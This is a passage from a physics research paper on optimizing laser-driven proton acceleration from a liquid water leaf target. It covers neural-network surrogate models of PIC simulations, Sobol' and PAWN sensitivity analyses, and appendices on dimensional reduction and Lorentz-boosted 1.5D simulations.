for the initial parameters are depicted in Figure 6. A more intricate measure of a TNSA experimental system is the laser-ion energy conversion efficiency, i.e. the measure of how much of the laser's input energy gets transported into the accelerated particles. We thus consider the optimization of the ratio of the total kinetic energy of the ions \(E_{\mathrm{H}}\) to the laser pulse energy \(E_{\mathrm{L}}\): \[\operatorname*{arg\,max}_{x\in\{\mathrm{params}\}}\frac{E_{\mathrm{H}}(x)}{E_ {\mathrm{L}}}=\operatorname*{arg\,max}_{x\in\{\mathrm{params}\}}\frac{1}{E_{ \mathrm{L}}}\cdot\int_{0}^{E_{\mathrm{max}}}\frac{\mathrm{d}N}{\mathrm{d}E} \cdot E\,\mathrm{d}E\;, \tag{6}\] where \(\frac{\mathrm{d}N}{\mathrm{d}E}(E,x)\) and \(E_{\mathrm{max}}\) are given by the neural network models, and \(\{\mathrm{params}\}\) is the set of all parameter combinations within the ranges specified in Table 1. It is important to note that the Smilei output gives \(\frac{\mathrm{d}n}{\mathrm{d}E}\) which has to be scaled by a unit volume \(V\) to arrive at the expression needed. For further explanation of how to arrive at the above integral term we refer to Appendix D. Here, we also allow the variation of laser energy \(E_{\mathrm{L}}\), increasing the complexity of the problem. The optimization described in Eq. (6) was carried out by solving the numerical integral using the composite trapezoidal rule and once again employing the Byrd-Omojokun algorithm. As seen in Table 2, despite having a slightly lower maximum ion energy than the first optimization task, the calculated energy conversion efficiency is more than five times greater. This gives a strong indication that laser coupling into the target in a laser-plasma experiment depends on the physical parameters of the system in a highly non-trivial way. \begin{table} \begin{tabular}{c c c c c c} \hline No & Attribute & Initial & Optimized & Optimized & Units \\ & & & (\(E_{\mathrm{max}}\)) & (\(E\)-conversion) & \\ \hline 1 & Laser energy & 30 & 6.6 & 1.4 & J \\ 2 & Focus-FWHM & 20 & 4.2 & 2 & \(\mathrm{\SIUnitSymbolMicro m}\) \\ 3 & Pulse length & 30 & 149.9 & 137.6 & fs \\ 4 & **Polarization** & **p** & **p** & **p** & \\ 5 & Incidence angle & 12.2 & 32.2 & 29.3 & \(\mathrm{\SIUnitSymbolMicro o}\) \\ 6 & **Wavelength** & **800** & **800** & **800** & **nm** \\ 7 & Thickness & 2 & 3.0 & 3.0 & \(\mathrm{\SIUnitSymbolMicro m}\) \\ \hline & \(E_{\mathrm{max}}\) & 13.8 & 51.5 & 51.2 & MeV \\ & \(\eta_{\mathrm{conv}}\) & 1.0 & 7.8 & 41.3 & \\ \hline \end{tabular} \end{table} Table 2: Table of the physical parameters to be optimized for the laser system. Both initial and optimized values are shown. Rows in bold remained fixed during optimization. The dimensionless laser amplitude \(a_{0}\) also remained fixed during optimization to encourage the convergence towards non-trivial parameter combinations. \(\eta_{\mathrm{conv}}\) is a measure for energy conversion efficiency (see Eq. (6)), normalized to the initial parameter case. ### Sensitivity Analysis Artificial neural networks are generally difficult to interpret, which is a drawback we have to accept. Nevertheless, the importance of specific parameters for a model can be evaluated. One way to quantify the impact of a model's input parameters on its output is to use variance-based global sensitivity analysis, also known as the Sobol' method. The corresponding sensitivity metrics are known as _Sobol' indices_[39; 40; 41]. The Sobol' indices are calculated by Monte Carlo sampling of parameters and corresponding model outputs. This method is used to apportion the variance of the output to the inputs and their combinations. The number of evaluations of our model is \(N\times(2D+2)\), where \(D\) is the number of input features and \(N\) is the number of samples drawn. \(N\) is ideally selected as a power of 2, where we selected \(2^{18}=262\,144\) drawn samples. We used the PAWN method [42] for a second sensitivity analysis to complement the Sobol' method due to its shortcomings for the higher order of the input features. The PAWN method uses a different approach for when the variance might not be a good measure for the outcome of a system. It utilizes the traits of the Cumulative Distribution Functions with similar Monte Carlo sampling as for the Sobol' indices, giving a different approach to determine the sensitivity of a model. A combination of these two methods was also proposed by Baroni et al. [43]. ### Reduced Model The reduced cutoff model has 7 input features which are mapped to 1 output prediction for the maximal energy. Our results of the Sobol' analysis for the reduced H\({}_{2}\)O-only model are given in Figure 7. The larger the value of a Sobol' index is, the more influence the independent parameter has on the result. The total Sobol' indices, normally referred to as \(S_{T}\) give a measure of the total importance of the given features. The total Sobol' indices can neither describe how much of the variance is attributed to which combination of parameters nor are they normalized for the total expression. This is due to multiple counting of effects, e.g. if there is a second-order contribution for \(\Theta_{L}\) and \(r_{L}\), then this contribution is added to both of the values in the total representation. It doubles the counting for the second order, triples for the third order, and so on. Due to this complication, the determination of higher-order dependencies makes it necessary to display the first and second-order Sobol' indices, as done in Figure 7 (b). The values are displayed in a matrix, such that the interaction between \((x_{i},y_{j})\) can be displayed. The first order Sobol' indices are shown on the main diagonal (\(x_{i}=y_{j}\)). It is evident from the plot, that the sum does not add up to 1, leaving approximately 21 % of data variance unexplained. The consequence of this is, that even higher order interactions are necessary to fully explain the variation in our model. Full calculation of higher orders has been omitted as it was deemed unfeasible due to the extreme computational cost for higher dimensions. The results of the PAWN method are displayed in Figure 8. PAWN can only give us a measure of the full importance of the individual parameters. A subsequent division into main effects and higher order is not possible. The importance ranking from PAWN does not entirely match the order found by the Sobol' method but is rather close. Both are listed in Table 3. If not the to \begin{table} \begin{tabular}{c c c} \hline \hline Importance & Sobol’ & PAWN \\ \hline 1 & \(r_{L}\) & \(\Theta_{L}\) \\ 2 & \(\Theta_{L}\) & \(r_{L}\) \\ 3 & \(E_{L}\) & \(E_{L}\) \\ 4 & \(\tau_{L}\) & \(\tau_{L}\) \\ 5 & \(\lambda_{L}\) & \(\lambda_{L}\) \\ 6 & \(d_{T}\) & \(d_{T}\) \\ 7 & Pol & Pol \\ \hline \hline \end{tabular} \end{table} Table 3: Importance ranking of the model parameters as calculated by the Sobol’ and PAWN methods. Figure 6: Energy spectra of H-ions for a TNSA water leaf target experiment using both initial VEGA-3 as well as optimized parameters with respect to the maximum ion energy. Predicted spectra by the neural network model and spectra from a 1D PIC simulation are shown. The parameters are given in Table 2. tal, but the sum of first and second-order Sobol' is taken, then the first two features change places. The sensitivity analyses thus suggest that higher-order interactions are important in this model and a simple optimization (e.g. maximizing only one quantity) is not sufficient. Our previously presented optimizations take this implicitly into account. Furthermore, the incidence angle and the irradiation area appear to be important. The angle \(\Theta_{\mathrm{L}}\)'s high influence is expected, considering laser-ion absorption mechanisms, and is faithfully implemented into the 1D simulation space using the Lorentz boosted geometry (see Appendix C). While the third quantity, the laser energy, directly scales the laser's dimensionless amplitude \(a_{0}\), the irradiation radius \(r_{\mathrm{L}}\)'s influence is more difficult to understand. The irradiation area is not directly represented in a 1.5D PIC simulation. However, since \(a_{0}\) is dependent on \(r_{\mathrm{L}}\) an indirect influence is included. ### Full Model Running the same analysis for the full cutoff model including the mixture parameters yields the results given in Figure 9 and Figure 10. As can be seen in the display of the data, the mixture has, according to the Sobol' analysis, minimal if not zero influence on the maximum energy of the hydrogen component, while the PAWN analysis gives a higher influence. Furthermore, the variance of the output can be better explained in this model, than from the reduced model although the geometry did not change. ### Sensitivity Analysis Discussion We performed a sensitivity analysis on our models and were able to evaluate the importance of the different parameters. We found evidence that the model describing the laser-plasma system is highly non-linear. It should be noted that a deep learning model approximates the physical system very well. It does not, however, provide a closed-form solution for the underlying physics, which would require further theoretical work. The models apply regression for the simulated data and as such are able to reproduce a mean curve for the data, which is for example displayed in Figure 6 or in Figure 4. The spectrum models take the energy bin value into account and predict the continuum of accelerated ions. This means, that the dependency on the bin's en Figure 8: PAWN indices for the reduced model as a measure for parameter importance. Boxes consist of uncertainty value, minimum, median, maximum, and upper uncertainty value. The numerical value given is the median. Figure 7: Sobol’ sensitivity analysis results showing the influence of various physical parameters on the cut-off energy of H-ions for a TNSA water leaf target experiment, for the reduced model utilizing only the H\({}_{2}\)O data. Errors are given in the 95 % confidence level. ergy would be included as well. An explainable analysis of taking all energy bin values into account then becomes infeasible as each bin would require a separate Sobol/PAWN analysis. The cut-off energy of a TNSA spectrum is the main parameter investigated in the literature, which is for example analyzed by Zimmer et al. [15]. We have seen that we can get similar results to Zimmer et al. for the cut-off energy dependencies. We see from the Sobol' analysis, that several parameters are of importance, therefore having only a single parameter to describe the cut-off is not sufficient. Since second-order Sobol' indices are not zero, we have to take them into account as well. Since neither model is explaining the cut-off variation close to 100 %, when only 1st and 2nd-order variations are taken into account, we can conclude that the calculated models require consideration of even higher order variations to describe an additional 10 %-20 % of the cut-off variation. Such a large reliance on higher-order interactions implies that simple scaling models are unideal for optimizations since these effects are not taken into account. A model capable of approximating highly nonlinear effects, such as our neural network models, should thus be preferred. The Sobol' indices decompose the function into a unique space [39], this could be used to construct a polynomial chaos expansion [44] polynomial from it. This polynomial can describe the same amount of variation as indicated by first and second-order Sobol'. It is therefore neither a complete representation of our network-based models nor is it physically interpretable. ### Interpretations Two major observations from the numerical study are of interest for the understanding of the modeled system. The first observation is the deviation from the exponential Mora-like shape towards the plateau-like features as presented in Figure 1. An explanation of this effect is the particle-particle interaction inside the expanding plasma. The driver of this effect is the higher-mass particle species (heavy ions), which is accelerated later than the lower-mass particle species (protons). Heavy ions, with their higher inertia co-propagate with lower energy protons and interact via the Coulomb force. Due to the higher inertia, the protons are pushed away from the heavy ions, being accelerated as a result. This effect is especially highlighted by 1D PIC simulations since no transverse particle movement is allowed. For higher or Figure 10: PAWN indices for the full model as a measure for parameter importance. Boxes consist of uncertainty value, minimum, median, maximum, and upper uncertainty value. The numerical value given is the median. Figure 9: Sobol’ sensitivity analysis results showing the influence of various physical parameters on the cut-off energy of H-ions for a TNSA water leaf target experiment, for the full model utilizing only the H\({}_{2}\)O data. Errors are given in the 95 % confidence level. der dimensions [10] or experimental data [21] the effect is less dominant and the transitions are smoother. If the particles are accelerated purely in the longitudinal direction, the divergence, which is given by the quotient of transversal and longitudinal momentum, can be reduced as well [45] (Eq. 2). The second observation is the high increase in energy absorption. The fraction of the energy passed onto the protons increases by a factor of about 42. As shown in the validation for the angular Lorentz boost scheme in Appendix C, a large increase in the absorption efficiency is a result of the angle-dependent resonance absorption. Indications for this are displayed in Figure 12 and Figure 14. The optimization algorithm exploits this behavior directly and therefore finds ideal angle values. However, there are at least two sides to this coin. The goal of the approach was to describe the TNSA process in a model which allows for the optimization of the output depending on the input. Approaching this directly and analytically is not possible. The time development of the governing Maxwell-Vlasov system, which already is a simplification using the collision-free case, can not be solved in closed form. No true relations for the cut-off energy, for example, have been derived so far. To get as close to this ground truth as possible, and to become able to extract it at a later point (with sufficient experimental data), a complex numerical model must be used. In our case, we adopted an artificial neural network approach. Artificial neural networks have desirable properties as they have been shown to be universal function approximators [46]. However, the explainability of such complex models has been a critical point in their analysis for some time. The sensitivity analyses shown in section III.2 were used as a way to mitigate the complexity and gain some explainability of the model. The Sobol' indices method, or global variance-based method, underlines, that the interaction of the different parameters is of importance. First and second order can only explain 79% of the models' variance (Figure 7 b). This means that higher-order dependencies of the input parameters are necessary to explain a significant part (21%) of the variance. The model can not explain which higher-order effect i.e. which combination of input quantities, is exactly responsible. The model's goal is to allow engineering optimization of the TNSA process. As a result of this optimization, this higher-order dependency was found. ## IV Conclusion In this study, we modeled and optimized a possible TNSA experiment using a liquid leaf target by employing a combination of Particle-In-Cell simulations and deep learning. In agreement with previous studies [10; 21], we have seen that the accelerated spectra from a multi-species target behave untypical in comparison to regular one-species TNSA which is described by Mora. We developed surrogate models that replicate computationally costly PIC simulations using a deep learning approach. Deep learning is well-suited for optimizing complex systems. To take advantage of the trained models' inference speed, we used the Byrd-Omojokun algorithm to find an optimal parameter configuration for the system. This yielded a set of parameters that resulted in optimal maximum hydrogen energy (8 times greater than the initial parameters) and a set of parameters that resulted in optimal laser energy conversion efficiency (41 times greater than the initial parameters). We verified these findings with additional PIC simulations. We applied sensitivity analysis methods to evaluate the influence of the different parameters and successfully identified the relevant ones. We showed that such sensitivity analysis methods bear great potential for the understanding and quantification of physical dependencies when a closed-form solution is not known. The data-based model that we developed can be extended in the future to improve predictions and better understand the system. This can be achieved by incorporating future experimental data for the liquid jet. ## Author Declarations The authors have no conflicts of interest to disclose. ## Data Availability Statement Codes and data are available on request. ## Funding Statement This work was funded by HMWK through the LOEWE center "Nuclear Photonics." This work is also supported by the Graduate School CE within the Centre for Computational Engineering at Technische Universitat Darmstadt. The results presented here are based on simulations, which were performed on the Virgo HPC cluster at the GSI Helmholtzzentrum fur Schwerionenforschung, Darmstadt (Germany) in the frame of FAIR Phase-0. ## Acknowledgments We would like to thank the Smilei team for providing valuable discussions. We would also like to thank Ion Gabriel Ion and Dimitrios Loukrezis for the helpful discussions on sensitivity analysis and the physical interpretation of artificial neural network models. ## Appendix A Units and Dimensionality The simulations in this work were done using the particle-in-cell (PIC) method [47]. In the following section, we discuss the units and dimensions of the underlying Maxwell Vlasov system and extract a lower number of relevant parameters which give valuable physical insight. This is important to understand why 9 parameters were used in our model. The basis we construct in this chapter can be represented by the physical parameters we sampled for the simulation part of our study. ### Basis Maxwell Vlasov System and Normalization TNSA requires a high-intensity laser pulse to heat plasma electrons up to MeV temperatures. We assume that the mean free path is larger than the target thickness and the whole process can therefore be assumed as collision-free [48; 49]. If the process is collision-free, it can be characterized by the Maxwell-Vlasov system of partial differential equations. \[\nabla\cdot\vec{B} =0\] \[\nabla\cdot\vec{E} =\frac{\varrho}{\varepsilon_{0}}\] \[\nabla\times\vec{E} =-\frac{\partial\vec{B}}{\partial t} \tag{10}\] \[\nabla\times\vec{B} =\mu_{0}\vec{j}+\mu_{0}\varepsilon_{0}\frac{\partial\vec{E}}{ \partial t}\] \[0 =\frac{\partial f_{\alpha}}{\partial t}+\vec{v}_{\alpha}\cdot \nabla f_{\alpha}+q_{\alpha}\left(\vec{E}+\vec{v}_{\alpha}\times\vec{B} \right)\cdot\frac{\partial f_{\alpha}}{\partial\vec{p}}\] Solving these coupled equations efficiently with numerical methods makes it important to simplify relations. A normalization towards reference quantities is the first step: \[t^{\prime} =\frac{t}{\tau}\quad\text{where $\tau$ is the pulse length} \tag{11}\] \[r^{\prime} =\frac{r}{L}\quad\text{where $L$ is the focus size on the target}\] (12) \[p^{\prime} =\frac{p}{p_{0}}\quad\text{with}\quad p_{0}=\frac{eE_{0}}{ \omega_{\text{L}}}\] (13) \[\vec{E} =E_{0}\hat{\vec{E}}\] (14) \[\vec{B} =\frac{E_{0}}{c}\hat{\vec{B}} \tag{15}\] The charge distribution and the current can further be expressed by \[\varrho =\int\sum_{\alpha}f_{\alpha}\,\mathrm{d}^{3}\vec{p}\quad\text{and} \tag{16}\] \[\vec{j} =\int\sum_{\alpha}f_{\alpha}\vec{v}_{\alpha}\,\mathrm{d}^{3}\vec {p}\quad\text{with}\quad\vec{v}_{\alpha}=\frac{\vec{p}}{m_{\alpha}}\left(1+ \frac{p^{2}}{m_{\alpha}^{2}c^{2}}\right)^{-1/2}, \tag{17}\] where \(f_{\alpha}\) denotes the charge density. These can be normalized to a reference quantity as well by modifying \(f_{\alpha}\) accordingly shifting all dimensions into the new \(n_{\alpha}\) \[\hat{f}_{\alpha}=\frac{f_{\alpha}}{n_{\alpha}} \tag{18}\] ### Similitude Relations and Dimensional Reduction A system of equation can be simplified, by applying the Buckingham \(\Pi\) theorem [50]. This theorem allows us to take the dimensional quantities of a problem into account and find underlying dimensionless quantities which reflect the actual physical meaning. If the boundary and initial conditions are similar, then fewer dimensionless parameters than dimensional parameters can be found to fully represent this equation system. This implies that the shape of the electromagnetic wave, defined by \(\vec{B}\) and \(\vec{E}\), and the normalized charge density \(\hat{f}_{\alpha}\), have to be similar. Similar in this case means, that the governing function is the same except for some parameters which themselves can be derived using the Buckingham \(\Pi\) Theorem as well. To ensure similarity in this work, a Gaussian profile was assumed for the electromagnetic wave, leaving the laser frequency \(\omega_{\text{L}}\), the pulse length \(\tau_{\text{L}}\), and the corresponding electric peak field \(E_{0}\) as variable quantities. The initial plasma distribution is defined as a homogeneous slab with particle density \(n_{0}\) and a thickness \(d_{\text{T}}\) with exponential decaying pre-plasma and skirt. The exact relations are given in section II.2. Keeping these initial conditions fixed allows us to apply the Buckingham \(\Pi\) Theorem to the Maxwell-Vlasov system of equations. This results in dimensionless quantities \(\Pi_{i}\) which are capable of describing all dimensional quantities inside the equation system. The dimensional quantities are given in Table 4. Using these dimensional \begin{table} \begin{tabular}{c c c} \hline Quantity & Dimensions & Type \\ \hline \(\tau\) & T\({}^{1}\) & \\ \(L\) & I\({}^{1}\) & \\ \(q/m\) & C\({}^{1}\) T\({}^{1}\) Mass\({}^{-1}\) & Primary \\ \(E_{0}\) & M\({}^{1}\) L\({}^{1}\) C\({}^{-1}\) T\({}^{-3}\) & \\ \(\omega\) & T\({}^{-1}\) & Primary \\ \(\mu_{0}\) & M\({}^{1}\) L\({}^{1}\) T\({}^{-2}\) C\({}^{-2}\) & Primary \\ \(\varepsilon_{0}\) & M\({}^{-1}\) L\({}^{-3}\) T\({}^{4}\) C\({}^{2}\) & Primary \\ \(n_{\alpha}\) & C\({}^{1}\) T\({}^{1}\) L\({}^{-3}\) & \\ \hline \end{tabular} \begin{tabular}{c c c} \hline Quantity & Dimensions & Type \\ \hline \(\tau\) & T\({}^{1}\) & \\ \(L\) & I\({}^{1}\) & \\ \(q/m\) & C\({}^{1}\) T\({}^{1}\) Mass\({}^{-1}\) & Primary \\ \(E_{0}\) & M\({}^{1}\) L\({}^{1}\) C\({}^{-1}\) T\({}^{-3}\) & \\ \(\omega\) & T\({}^{-1}\) & Primary \\ \(\mu_{0}\) & M\({}^{1}\) L\({}^{1}\) T\({}^{-2}\) C\({}^{-2}\) & Primary \\ \(\varepsilon_{0}\) & M\({}^{-1}\) L\({}^{-3}\) T\({}^{4}\) C\({}^{2}\) & Primary \\ \(n_{\alpha}\) & C\({}^{1}\) T\({}^{1}\) L\({}^{-3}\) & \\ \hline \end{tabular} \begin{tabular}{c c} \hline T: Time, L: Length, C: Current, M: Mass \\ \hline \end{tabular} \end{table} Table 4: Overview of the dimensional quantities of the Maxwell-Vlasov EQS. Dimensions are listed in SI base dimensions. Buckingham \(\Pi\) parameters are calculated by defining primary quantities which are used multiplicatively in each parameter. quantities, the following \(\Pi_{i}\) are determined: \[\Pi_{1} =\omega_{\mathrm{L}}\tau_{\mathrm{L}} \tag{10}\] \[\Pi_{2} =\omega_{\mathrm{L}}L\sqrt{\mu_{0}\varepsilon_{0}}=\frac{\omega_{ \mathrm{L}}L}{c}\] (11) \[\Pi_{3} =\frac{q_{\alpha}n_{\alpha}}{\varepsilon_{0}m_{\alpha}\omega_{ \mathrm{L}}^{2}}=\begin{cases}\frac{\hat{n}_{e}e^{2}}{\varepsilon_{0}m_{ \mathrm{e}}\omega_{\mathrm{L}}^{2}}&\text{for electrons}\\ &\\ \frac{\hat{n}_{\alpha}Z_{\alpha}^{2}e^{2}}{\varepsilon_{0}m_{\alpha}\omega_{ \mathrm{L}}^{2}}&\text{for ions}\end{cases}\] (12) \[\Pi_{4} =\frac{q_{\alpha}E_{0}}{m_{\alpha}\omega_{\mathrm{L}}}\sqrt{\mu _{0}\varepsilon_{0}}=\begin{cases}\frac{E_{0}}{\omega_{\mathrm{L}}c}\frac{e}{ m_{\mathrm{e}}}&\text{for electrons}\\ &\\ \frac{E_{0}}{\omega_{\mathrm{L}}c}\frac{Z_{i}e}{m_{i}}&\text{for ions} \end{cases} \tag{13}\] The theorem also states that the number of resulting dimensionless parameters is lower than the number of dimensional parameters, reducing the complexity of the model. #### a.3.3 Interpretation of the dimensionless quantities These quantities are sufficient to describe and condition the EQS from a mathematical standpoint. From a physical standpoint, this also creates valuable insight. \(\Pi_{1}\) gives the number of \(\vec{E}\)-oscillations in the laser pulse and \(\Pi_{2}\) the irradiation size of the laser. \(\Pi_{3}\) correlates the laser with the target since it is the ratio of the particle density to the critical plasma density defined by the laser. \(\Pi_{4}\) describes the particle dynamic inside the laser's amplitude for each species. For electrons, \(\Pi_{4}\) is identical to the dimensionless quiver velocity \(a_{0}\). The meaning is equivalent for the different ion species. Writing down the EQS and substituting the \(\Pi\) parameters makes their importance apparent: \[\tilde{\nabla}\cdot\hat{\vec{B}} =0 \tag{14}\] \[\tilde{\nabla}\cdot\hat{\vec{E}} =\underbrace{\int\sum_{\alpha}\frac{\Pi_{2}\cdot\Pi_{3\alpha}}{ \Pi_{4\alpha}}\,\mathrm{d}^{3}\,\tilde{\vec{p}}}_{=0\text{ for }t=0}\] (15) \[\tilde{\nabla}\times\hat{\vec{E}} =-\frac{\Pi_{2}}{\Pi_{1}}\frac{\partial\hat{\vec{B}}}{\partial \hat{\vec{t}}}\] (16) \[\tilde{\nabla}\times\hat{\vec{B}} =\frac{\Pi_{2}}{\Pi_{1}}\frac{\partial\hat{\vec{E}}}{\partial \hat{\vec{t}}}+\int\sum_{\alpha}\frac{4\pi\Pi_{2}\Pi_{3\alpha}\tilde{\vec{p}} }{\sqrt{\hat{p}^{2}\Pi_{4\alpha}^{2}+1}}\hat{f}_{\alpha}\,\mathrm{d}^{3}\, \tilde{\vec{p}}\] (17) \[0 =\frac{1}{\Pi_{1}}\frac{\partial\hat{f}_{\alpha}}{\partial\hat{ \vec{t}}}+\frac{1}{\Pi_{2}}\frac{\Pi_{4\alpha}\tilde{\vec{p}}}{\sqrt{\hat{p} ^{2}\Pi_{4\alpha}^{2}+1}}\frac{\partial\hat{f}_{\alpha}}{\partial\hat{\vec{r}}}\] \[+\left(Z_{\alpha}\hat{\vec{E}}+\frac{\Pi_{4\alpha}}{\sqrt{\hat{p }^{2}\Pi_{4\alpha}^{2}+1}}\tilde{\vec{p}}\times\hat{\vec{B}}\right)\frac{ \partial\hat{f}_{\alpha}}{\partial\hat{p}} \tag{18}\] If these parameters are constant, then the equations are all the same and therefore behave the same. This results in the same time development of the system and therefore yields the same results. One can say that for constant \(\Pi_{i}\) areas of iso-dynamics exist, finally simplifying any model approaches by reducing the dimensions to be examined. Models therefore only need these 4 parameters to precisely determine a system. #### a.3.4 Correlating dimensionless parameters and simulation input The system, therefore, has a dedicated number of \(\Pi\) Parameters which have to be taken into account: \(\Pi_{1}\) and \(\Pi_{2}\) are laser-relevant quantities and therefore particle species independent. \(\Pi_{3}\) and \(\Pi_{4}\) describe quantities of the particle species, therefore introducing a multiplicity in the parameter, denoted by \(\alpha\). In the case investigated here, the multiplicity is 4: electrons, oxygen, hydrogen, and deuterium. The system is initialized with the same spatial distribution function \(\hat{f}_{\alpha}\) for each species. To mimic ionization and mixture some conditions apply: \[N_{\mathrm{O}}=2\times N_{H/D}\quad\text{and}\quad N_{e}=Z_{O}^{\mathrm{eff}}+ Z_{H/D} \tag{19}\] Taking these assumptions into account resolves the multiplicity and the corresponding \(\Pi\)s can be expressed with a multiplicative factor. The construction, including the multiplicative factors and the needed parameters, are given in Table 5. Red and green mark the relevant, varying parameters to be taken into account. ### Mapping physical to dimensionless parameters As stated in the main body of this work, several physical input quantities are used. They are chosen based on keeping datasets consistent and comparable. Therefore some parameters are sampled which do not exist in 1D. This also ensures that the data can be broken down \begin{table} \begin{tabular}{l l} \hline \hline Parameter & Definition \\ \hline \(\Pi_{1}\) & \(\omega_{L}\tau_{\mathrm{L}}\) \\ \(\Pi_{2}\) & \(\omega_{L}L/c\) \\ \hline \(\Pi_{3O}\) & \(Z_{O}^{\mathrm{eff}}/m_{O}\times n_{O}/{\omega_{L}}^{2}\) \\ \(\Pi_{3e}\) & \(\Pi_{3O}\times\left(Z_{O}^{\mathrm{eff}}+2\right)\times\frac{m_{O}}{m_{e}}\cdot \frac{q_{\alpha}}{e^{2}\omega}\) \\ \(\Pi_{3H}\) & \(\Pi_{3O}\times 2\mathrm{mix}\times\frac{m_{O}}{m_{H}}\cdot\frac{q_{H}}{e^{-2} \omega}\) \\ \(\Pi_{3D}\) & \(\Pi_{3O}\times 2\left(1-\mathrm{mix}\right)\times\frac{m_{O}}{m_{D}}\cdot\frac{q_{ \alpha}}{e^{-2}\omega}\) \\ \hline \(\Pi_{4e}\) & \(q_{e}/m_{e}\times E_{0}/\omega_{L}c\) (\(a_{0}\)) \\ \(\Pi_{4H}\) & \(\Pi_{4e}\times\frac{m_{e}}{m_{H}}\cdot\frac{q_{H}}{\hat{\vec{p}}}\) \\ \(\Pi_{4D}\) & \(\Pi_{4e}\times\frac{m_{e}}{m_{D}}\cdot\frac{q_{\alpha}}{\hat{\vec{p}}}\) \\ \(\Pi_{4O}\) & \(\Pi_{4e}\times\frac{m_{e}}{m_{O}}\cdot\frac{q_{\alpha}}{\hat{\vec{p}}}\) \\ \(\Pi_{4O}\) & \(\Pi_{4e}\times\frac{m_{e}}{m_{O}}\cdot\frac{2\hat{O}}{q_{e}}\) \\ \hline \hline \end{tabular} \end{table} Table 5: Construction of \(\Pi\) parameters. into the \(\Pi_{i}\) with the following relations. It is important to note that from the \(\Pi_{4}\) possibilities only the electron variant (equivalent to \(a_{0}\)) has to be passed to the PIC code. \[\Pi_{1} =\frac{2\pi c\tau_{\mathrm{L}}}{\lambda_{\mathrm{L}}} \tag{10}\] \[\Pi_{2} =\frac{2\pi\mathrm{FWHM}}{\lambda_{\mathrm{L}}}\] (11) \[\Pi_{3} =\frac{Z_{\mathrm{eff}}^{2}e^{2}n_{0}\lambda_{\mathrm{L}}^{2}}{ \varepsilon_{0}4\pi^{2}m_{0}c^{2}}\] (12) \[\Pi_{4} =\left(\frac{E_{\mathrm{L}}\lambda_{\mathrm{L}}^{2}\sin\left( \Theta_{\mathrm{L}}\right)}{\tau_{\mathrm{L}}\pi\mathrm{FWHM}^{2}\cdot 1.37 \times 10^{18}}\right)^{2} \tag{13}\] This culminates in a needed dimensionality of 9 for the list of parameters: 4 \(\Pi_{i}\), 2 parameters to deal with the ambiguity \(Z_{O}^{\mathrm{eff}}\) and the mixture parameters, 1 parameter for the plasma slab \(d_{T}\) (particle density is fixed) and 2 for dealing with laser's polarization: Selection whether p / s linear polarization and to make a difference, variation of the incidence angle \(\Theta_{L}\). Taking the mapping into account (Eqs. (10)-(13)). A proper physical sampling includes: 1. Ionization of oxygen 2. Mixtures (deuterium vs hydrogen) 3. Laser Polarization 4. Laser Energy / Joule 5. Laser Pulse Time / second 6. Laser Irradiation Size / micron 7. Laser Wavelength / meter 8. Laser Incidence Angle / Degree (to the plasma normal) 9. Plasma Slab Thickness These 9 parameters have the same dimensionality as the parameter space calculated by the \(\Pi_{i}\) which is necessary since the construction of dedicated quantities (especially the electric field of the laser) cannot be determined easily and a composition of these parameters has to be taken into account. ## Appendix B Parameter Ranges As mentioned in section II.2.2 two paradigms are relevant for the selection of the parameter ranges. The class of Petawatt laser systems we based our work on uses mainly linearly polarized laser light and is capable of varying the incidence angle. Taking this into account we get two possibilities for the laser's polarization: s-polarization and p-polarization. Similarly, we can get angles from \(0^{\circ}\) to less than \(90^{\circ}\). At \(90^{\circ}\) the laser is not hitting the target and is traveling parallel to the plasma surface, we, therefore, chose to cut the interval at \(85^{\circ}\). The laser energy was selected to cover a large area to increase the comparability of the model with different laser systems. At the conceptualization phase of this study, it was unreasonable to assume high repetition rate experimentation with much larger systems (e.g. GSI's PHELIX system [51; 52]), since the currently achievable repetition rates were too low. This might change in the future, such that higher energies are realistic, and the model base has to be expanded under such cases. The most critical parameter is the pulse length. As our reference value, we selected the FWHM in the time domain of a pure Gaussian pulse. Firstly, the approximation of a pure Gaussian pulse is not necessarily true for a technically implemented laser. If the FWHM according to Equation 4 is not used, then the value has to be adjusted accordingly. Due to calculation time issues of the underlying PIC models, we reduced the selected times to the interval from \(15\,\mathrm{fs}\) to \(150\,\mathrm{fs}\). We know that this time can be significantly larger, but high repetition systems can operate with low pulse length variables. We also acknowledge, that our lower simulation border for the time is close to the bandwidth-limited pulse limit, but we wanted to have some lower data points to force the interpolation into good behavior and therefore mathematically overshot into the lower regime. The upper pulse length boundary is also the first parameter we want to increase in further studies since technical laser systems do need a larger pulse length to apply this model. The focus FWHM was then sampled according to the definition of the laser \(a_{0}\) conditions which we applied to our parameters. We made sure to stay in the TNSA regime and prevented the laser \(a_{0}\) to be smaller than one and keep the focus still realistically small with \(2\,\mathrm{\SIUnitSymbolMicro m}\) as the lower range cut-off. The selected wavelengths are larger than those used in engineered systems and also are somehow continuously sampled from this larger range. The reason for this is the importance of the wavelength parameter following the similitude relations, which are dependent on the laser wavelength in every component. Concerning the target, we chose the thickness according to the parameters of the physical implementation of a liquid jet, which is currently under development. The mixture can only vary between 0 and \(100\,\mathrm{\char 37}\). Again, the effective charge of the particles plays an important role. We started with fully ionized oxygen and found traits of the multi-species effect during our investigation. While discussing the results, we generalized the effective charge discussion but were not able to properly simulate different effective ionization levels. This is due to a lack of proper ionization models (also beyond the scope of this study) and limited numerical resources. This would also be a parameter that could be further improved in additional studies. ## Appendix C Transversal Lorentz Boosted 1.5D PIC Simulations Modeling oblique laser incidence onto a target is inherently at least a 2D problem, which requires substantially more computational power than a similar 1D geometry to simulate. Bourdier [53] thus proposed a method in which a relativistic Lorentz boost is applied to the frame of reference in the simulation. This method has later been employed by Gibbon et al. [54] in a PIC code. Here, we would like to present the implementation of this technique yet again for a modern PIC code while also correcting some mistakes in the calculations by Gibbon et al.. A schematic of the general principle is shown in Figure 11. To obtain the results in the lab frame a back transformation must be applied to the diagnostics obtained from the simulation. For finding the transformations, a simple Lorentz boost in \(y\)-direction by the velocity \(v_{y}=c\cdot\sin(\theta)\) is applied. In matrix form, this can be represented by: \[\Lambda=\begin{pmatrix}1/\cos(\theta)&0&-\tan(\theta)&0\\ 0&1&0&0\\ -\tan(\theta)&0&1/\cos(\theta)&0\\ 0&0&0&1\end{pmatrix}\;, \tag{10}\] since \(\gamma_{0}=\left(1-(v_{y}/c)^{2}\right)^{-1/2}=1/\cos(\theta)\). This transformation matrix can be used to transform all the quantities of the particles and the electromagnetic fields. Indicating quantities in the transformed system with a prime, we find after carrying out all transformations \[\begin{split} k^{\prime}_{y}&=0\\ \omega^{\prime}_{\text{L}}&=\omega_{\text{L}}/\gamma_{0}\\ 